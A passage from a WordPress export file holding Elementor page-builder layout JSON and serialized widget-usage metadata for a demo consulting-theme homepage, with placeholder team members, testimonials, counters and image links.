wealth.","icon_size":{"unit":"px","size":45,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_space_bottom":{"unit":"px","size":9,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"7b9261f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance-1.svg","id":637},"library":"svg"},"title":"Government Services","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":45,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_space_bottom":{"unit":"px","size":9,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"b93eb4f","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/card.svg","id":638},"library":"svg"},"title":"Consumer Products","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":45,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"title_space_bottom":{"unit":"px","size":9,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]}},"elements":[],"widgetType":"iiconbox2"}],"isInner":false},{"id":"b566430","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50,"margin":{"unit":"px","top":"32","right":"0","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"50","right":"0","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"2191082","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/holidays.svg","id":643},"library":"svg"},"title":"Airlines & Transport","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":45,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_space_bottom":{"unit":"px","size":9,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"4a2c6f6","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/energy.svg","id":980},"library":"svg"},"title":"Natural Resources","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":45,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_space_bottom":{"unit":"px","size":9,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"80ed2dc","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/notebook.svg","id":1108},"library":"svg"},"title":"Private Equity","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":45,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"title_space_bottom":{"unit":"px","size":9,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":false}],"isInner":false},{"id":"fae537c","elType":"section","settings":{"layout":"full_width","background_background":"classic","background_color":"#F7F7F7","padding":{"unit":"px","top":"115","right":"0","bottom":"200","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"140","left":"0","isLinked":false}},"elements":[{"id":"de1b5bf","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7f31cdc","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"44","left":"0","isLinked":false}},"elements":[{"id":"2e2d9c2","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"3ddb44d","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"a5dc036","elType":"widget","settings":{"sub":"our team","title":"Team Leaders of Company","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bottom_space":{"unit":"px","size":11,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"stitle_bg":"#4B83FC1A","subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"686b43e","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"786d876","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"b64f23e","elType":"section","settings":{"layout":"full_width"},"elements":[{"id":"3bf2b26","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b899df3","elType":"widget","settings":{"members":[{"_id":"72bdcaa","member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team5.jpg","id":694},"member_name":"Mary Flynn","member_extra":"CHIEF TECHNOLOGY OFFICER","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"socials":"yes","social1":{"value":"fab fa-twitter","library":"fa-brand"},"social1_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"social2":{"value":"fab fa-facebook-f","library":"fa-brand"},"social2_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"social3":{"value":"fab fa-pinterest-p","library":"fa-brand"},"social3_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""}},{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team1.jpg","id":524},"member_name":"Monica Black","member_extra":"CHIEF COMMUNICATION OFFICER","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"socials":"yes","social1":{"value":"fab fa-twitter","library":"fa-brand"},"social1_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"social2":{"value":"fab fa-facebook-f","library":"fa-brand"},"social2_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"social3":{"value":"fab fa-pinterest-p","library":"fa-brand"},"social3_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"0420588"},{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team2.jpg","id":525},"member_name":"Peter Perish","member_extra":"CHIEF BUSINESS PROJECT","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"socials":"yes","social1":{"value":"fab fa-twitter","library":"fa-brand"},"social1_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"social2":{"value":"fab fa-facebook-f","library":"fa-brand"},"social2_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"social3":{"value":"fab fa-pinterest-p","library":"fa-brand"},"social3_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"6713001"},{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team3.jpg","id":526},"member_name":"Olivia Woodson","member_extra":"INTERNATIONAL CONSULTANT","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"socials":"yes","social1":{"value":"fab fa-twitter","library":"fa-brand"},"social1_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"social2":{"value":"fab fa-facebook-f","library":"fa-brand"},"social2_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"social3":{"value":"fab fa-pinterest-p","library":"fa-brand"},"social3_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"1610d27"},{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team4.jpg","id":527},"member_name":"Peter Adams","member_extra":"CO-FOUNDER OF COMPANY","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"socials":"yes","social1":{"value":"fab fa-twitter","library":"fa-brand"},"social1_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"social2":{"value":"fab fa-facebook-f","library":"fa-brand"},"social2_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"social3":{"value":"fab fa-pinterest-p","library":"fa-brand"},"social3_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"bc18366"},{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team6.jpg","id":695},"member_name":"Adam Oswald","member_extra":"CHIEF MARKETING OFFICER","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"socials":"yes","social1":{"value":"fab fa-twitter","library":"fa-brand"},"social1_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"social2":{"value":"fab fa-facebook-f","library":"fa-brand"},"social2_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"social3":{"value":"fab fa-pinterest-p","library":"fa-brand"},"social3_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"369195b"},{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team7.jpg","id":696},"member_name":"Kate Green","member_extra":"CHIEF FINANCIAL OFFICER","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"socials":"yes","social1":{"value":"fab fa-twitter","library":"fa-brand"},"social1_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"social2":{"value":"fab fa-facebook-f","library":"fa-brand"},"social2_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"social3":{"value":"fab fa-pinterest-p","library":"fa-brand"},"social3_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"ee9d08e"},{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team8.jpg","id":697},"member_name":"Harry Septem","member_extra":"CO-FOUNDER OF COMPANY","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"socials":"yes","social1":{"value":"fab fa-twitter","library":"fa-brand"},"social1_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"social2":{"value":"fab fa-facebook-f","library":"fa-brand"},"social2_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"social3":{"value":"fab fa-pinterest-p","library":"fa-brand"},"social3_link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"639b3ea"}],"tshow":"5","w_gaps":{"unit":"px","size":10,"sizes":[]},"dots_spacing":{"unit":"px","size":-96,"sizes":[]},"dots_spacing_mobile":{"unit":"px","size":-70,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"10","bottom":"0","left":"10","isLinked":false}},"elements":[],"widgetType":"iteamcarousel"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"af64f97","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-home2.jpg","id":1401},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"95","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"5dc3ab8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"01ed4fe","elType":"section","settings":{"layout":"full_width","gap":"extended","content_position":"middle","structure":"20","border_border":"solid","border_width":{"unit":"px","top":"0","right":"0","bottom":"1","left":"0","isLinked":false},"border_color":"#FFFFFF4D","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"7ff9824","elType":"column","settings":{"_column_size":50,"_inline_size":75,"margin":{"unit":"%","top":"0","right":"30","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a8193ce","elType":"widget","settings":{"title":"Doing the Right Thing, at the Right Time","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Amiri","typography_font_size":{"unit":"px","size":60,"sizes":[]},"typography_font_size_mobile":{"unit":"px","size":42,"sizes":[]},"typography_font_weight":"600","typography_line_height":{"unit":"px","size":"","sizes":[]},"_margin_tablet":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"a28383b","elType":"column","settings":{"_column_size":50,"_inline_size":25},"elements":[{"id":"0e2c720","elType":"widget","settings":{"align":"flex-start","vlink":"https:\/\/vimeo.com\/87959439","caption":"watch video","btn_color":"#FFFFFF","btn_border_color":"#FFFFFF","btn_circle":"#FFFFFF","caption_color":"#FFFFFF"},"elements":[],"widgetType":"ivideopopup"}],"isInner":true}],"isInner":true},{"id":"76e430c","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40","padding":{"unit":"px","top":"55","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"257d0e4","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"641f702","elType":"widget","settings":{"title":"trusted<br> clients","number":"350","number_color":"#FFFFFF","number_typography_typography":"custom","number_typography_font_family":"Amiri","number_typography_font_size":{"unit":"px","size":56,"sizes":[]},"number_typography_font_weight":"bold","title_color":"#FFFFFF","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_weight":"500","title_typography_line_height":{"unit":"px","size":"","sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icounter"}],"isInner":true},{"id":"28f85c0","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"63e3298","elType":"widget","settings":{"title":"finished<br> projects","number":"215","number_color":"#FFFFFF","number_typography_typography":"custom","number_typography_font_family":"Amiri","number_typography_font_size":{"unit":"px","size":56,"sizes":[]},"number_typography_font_weight":"bold","title_color":"#FFFFFF","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_weight":"500","title_typography_line_height":{"unit":"px","size":"","sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icounter"}],"isInner":true},{"id":"762b081","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"1b308de","elType":"widget","settings":{"title":"years of<br> experience","number":"15","number_color":"#FFFFFF","number_typography_typography":"custom","number_typography_font_family":"Amiri","number_typography_font_size":{"unit":"px","size":56,"sizes":[]},"number_typography_font_weight":"bold","title_color":"#FFFFFF","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_weight":"500","title_typography_line_height":{"unit":"px","size":"","sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icounter"}],"isInner":true},{"id":"c81f233","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"661be41","elType":"widget","settings":{"title":"visited<br> conferences","number":"36","number_color":"#FFFFFF","number_typography_typography":"custom","number_typography_font_family":"Amiri","number_typography_font_size":{"unit":"px","size":56,"sizes":[]},"number_typography_font_weight":"bold","title_color":"#FFFFFF","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_weight":"500","title_typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"icounter"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"bb01329","elType":"section","settings":{"gap":"extended","padding":{"unit":"px","top":"115","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"3f37e40","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4f2e7dd","elType":"section","settings":{"layout":"full_width","gap":"extended","content_position":"bottom","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"b6800aa","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"a4dd117","elType":"widget","settings":{"sub":"portfolio","title":"Our Latest Case Studies","header_size":"h3","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"align":"center","stitle_bg":"#4B83FC1A","subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"}],"isInner":true}],"isInner":true},{"id":"1fa0cb3","elType":"widget","settings":{"all_text":"All","project_num":6,"load_more":"","loading_more":"Loading...","overlay_align":"left","position":"flex-end","overlay_background":"#26283299","show_icon":"","title_spacing":{"unit":"px","size":8,"sizes":[]},"cat_hcolor":"#4B83FC","layout":"style-2","cat_color":"#9D9D9D","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"ipfilter"},{"id":"7c3bd0f","elType":"widget","settings":{"align":"center","text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"b839191","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg3-home2.jpg","id":1406},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"90","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false}},"elements":[{"id":"58ee6ef","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3f48e1b","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"f136b72","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"9334aeb","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"d2b4c56","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"1249eaa","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"0077118","elType":"section","settings":{"structure":"30","layout":"full_width"},"elements":[{"id":"f024a1c","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true},{"id":"3dd1459","elType":"column","settings":{"_column_size":33,"_inline_size":66.13200000000000500222085975110530853271484375},"elements":[{"id":"8a9f5e8","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":1709},"tname":"Oliver Simson","tjob":"client of company","_id":"4b608b2"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"Manager","_id":"f2a510a"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"Designer","_id":"2012bf3"}],"arrows":"true","dots":"false","loop":"true","arrow_spacing":{"unit":"px","size":-127,"sizes":[]},"tcontent_color":"#616161"},"elements":[],"widgetType":"itestimonials2"}],"isInner":true},{"id":"eaa39eb","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"e31b0e9","elType":"section","settings":{"padding":{"unit":"px","top":"115","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"040f40f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"58189e4","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3c2b883","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"69596a1","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"101c6e8","elType":"widget","settings":{"sub":"our blog","title":"Read Our Latest Insights","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"60d1d03","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"f4fa830","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"b682204","elType":"widget","settings":{"post_num":3,"dots":"false","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"meta_color":"#818181"},"elements":[],"widgetType":"ipostcarousel"},{"id":"bf1dadf","elType":"widget","settings":{"align":"center","text":"view all","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-consulting\/blog\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:18:{s:17:"slider_revolution";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:14:"revslidertitle";i:1;s:9:"shortcode";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:43;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:43;s:19:"_inline_size_tablet";i:25;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:6:"margin";i:4;s:13:"margin_tablet";i:5;s:13:"margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:22;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:5:"style";a:2:{s:18:"section_background";a:7:{s:21:"background_background";i:6;s:16:"background_color";i:2;s:16:"background_image";i:4;s:19:"background_position";i:4;s:17:"background_repeat";i:4;s:15:"background_size";i:3;s:26:"background_position_tablet";i:1;}s:14:"section_border";a:3:{s:13:"border_border";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:7:"padding";i:18;s:14:"padding_mobile";i:9;s:14:"padding_tablet";i:3;}}s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:11;s:3:"gap";i:11;s:16:"content_position";i:4;}s:17:"section_structure";a:1:{s:9:"structure";i:11;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:2:{s:11:"img_spacing";i:1;s:32:"img_css_filters_hover_css_filter";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:8;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:6:{s:3:"sub";i:8;s:5:"title";i:8;s:11:"header_size";i:8;s:12:"align_mobile";i:1;s:5:"align";i:5;s:12:"align_tablet";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:7:{s:26:"title_typography_font_size";i:1;s:27:"title_typography_typography";i:5;s:33:"title_typography_font_size_mobile";i:5;s:9:"stitle_bg";i:8;s:14:"subtitle_style";i:8;s:11:"title_color";i:1;s:19:"stitle_bottom_space";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_mobile";i:3;s:8:"_padding";i:6;}}}}s:11:"text-editor";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:4;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:3;s:10:"text_color";i:1;}}}}s:9:"iiconbox1";a:3:{s:5:"count";i:4;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:5:"align";i:4;s:9:"icon_font";i:4;s:5:"title";i:4;s:3:"des";i:4;s:8:"btn_text";i:4;}}s:5:"style";a:3:{s:17:"style_box_section";a:7:{s:7:"is_line";i:4;s:11:"box_padding";i:4;s:16:"bg_hover_icon_bg";i:4;s:18:"bg_hover_des_color";i:4;s:12:"bg_hover_box";i:4;s:19:"bg_hover_icon_color";i:4;s:23:"bg_hover_link_btn_color";i:4;}s:18:"style_icon_section";a:4:{s:9:"is_border";i:4;s:10:"icon_space";i:4;s:9:"icon_size";i:4;s:13:"icon_bg_width";i:4;}s:21:"style_content_section";a:7:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;s:9:"des_color";i:4;s:25:"des_typography_typography";i:4;s:26:"des_typography_font_family";i:4;s:24:"des_typography_font_size";i:4;s:20:"link_btn_hover_color";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:4;s:8:"_padding";i:2;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:7;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:5:{s:13:"selected_icon";i:3;s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;}}s:5:"style";a:2:{s:18:"section_style_icon";a:4:{s:13:"primary_color";i:3;s:10:"icon_space";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;}s:21:"section_style_content";a:9:{s:18:"title_bottom_space";i:3;s:11:"title_color";i:3;s:27:"title_typography_typography";i:3;s:28:"title_typography_font_family";i:3;s:28:"title_typography_line_height";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:34:"description_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:13:"iiboxcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:11:"image_boxes";i:1;}}s:5:"style";a:1:{s:21:"style_content_section";a:1:{s:6:"box_bg";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:4:{s:12:"align_tablet";i:1;s:4:"text";i:3;s:5:"align";i:2;s:4:"link";i:1;}}}}s:9:"iiconbox2";a:3:{s:5:"count";i:6;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"icon_font";i:6;s:5:"title";i:6;s:3:"des";i:6;}}s:5:"style";a:2:{s:18:"style_icon_section";a:1:{s:9:"icon_size";i:6;}s:21:"style_content_section";a:3:{s:18:"title_space_bottom";i:6;s:27:"title_typography_typography";i:6;s:26:"title_typography_font_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_tablet";i:6;s:8:"_padding";i:4;s:15:"_padding_mobile";i:1;}}}}s:13:"iteamcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:7:"members";i:1;s:5:"tshow";i:1;s:6:"w_gaps";i:1;}}s:5:"style";a:1:{s:18:"navigation_section";a:2:{s:12:"dots_spacing";i:1;s:19:"dots_spacing_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:1:{s:5:"title";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:7:{s:11:"title_color";i:1;s:21:"typography_typography";i:1;s:22:"typography_f